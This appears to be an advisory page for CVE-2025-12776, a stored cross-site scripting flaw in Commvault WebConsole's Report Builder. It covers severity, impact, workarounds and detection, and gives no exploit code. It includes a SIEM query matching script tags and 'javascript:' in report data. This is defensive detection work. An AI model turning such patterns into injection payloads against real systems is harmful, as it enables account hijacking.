CVE-2025-12776 – This CVE describes a stored Cross-Site Scriptin... (How to Fix)

Q: What is the severity of CVE-2025-12776?

CVE-2025-12776 has a CVSS score of 5.4 (MEDIUM). This CVE describes a stored Cross-Site Scripting (XSS) vulnerability in the Report Builder component of WebConsole. Attackers with edit permissions can inject malicious scripts that execute when other users with edit permissions modify reports. The vulnerability affects users of the end-of-life WebConsole package.

📋 TL;DR

This CVE describes a stored Cross-Site Scripting (XSS) vulnerability in the Report Builder component of WebConsole. Attackers with edit permissions can inject malicious scripts that execute when other users with edit permissions modify reports. The vulnerability affects users of the end-of-life WebConsole package.

💻 Affected Systems

Products:

Commvault WebConsole

Versions: All versions (package is end-of-life)

Operating Systems: All supported by WebConsole

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects systems with WebConsole installed and Report Builder component enabled. Requires user with edit permissions to exploit.

📦 What is this software?

Commvault by Commvault

View all CVEs affecting Commvault →

Commvault by Commvault

View all CVEs affecting Commvault →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with edit permissions could inject malicious scripts that execute when other administrators modify reports, potentially leading to session hijacking, credential theft, or further system compromise.

🟠

Likely Case

Limited impact since exploitation requires edit permissions and only affects users modifying reports through the Report Builder interface.

🟢

If Mitigated

Minimal impact if deployed in isolated network without internet access and with strict access controls limiting edit permissions.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated user with edit permissions. No public exploit code identified.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: N/A

Vendor Advisory: https://documentation.commvault.com/securityadvisories/CV_2025_06_3.html

Restart Required: No

Instructions:

No official patch available as WebConsole is end-of-life. Follow vendor recommendation to avoid using in production.

🔧 Temporary Workarounds

Network Isolation

all

Deploy WebConsole in fully isolated network with no internet access or access to sensitive data

Access Control Restriction

all

Minimize users with edit permissions to Report Builder component

🧯 If You Can't Patch

Remove WebConsole from production environments entirely
Implement strict network segmentation and firewall rules to isolate WebConsole instances

🔍 How to Verify

Check if Vulnerable:

Check if WebConsole package is installed and Report Builder component is enabled

Check Version:

Check package manager or installation logs for WebConsole presence

Verify Fix Applied:

Verify WebConsole has been removed or isolated per security recommendations

📡 Detection & Monitoring

Log Indicators:

Unusual report modifications
Multiple failed edit attempts
Suspicious script-like content in report data

Network Indicators:

Unexpected outbound connections from WebConsole server
Traffic to/from isolated WebConsole network

SIEM Query:

source="webconsole" AND (event="report_edit" OR event="report_save") AND (data CONTAINS "<script>" OR data CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2025-12776

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.03% exploit probability (6.7th percentile)

Published: January 7, 2026

Last Updated: February 2, 2026

🔗 References

https://documentation.commvault.com/securityadvisories/CV_2025_06_3.html Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-12776, you might also want to check these: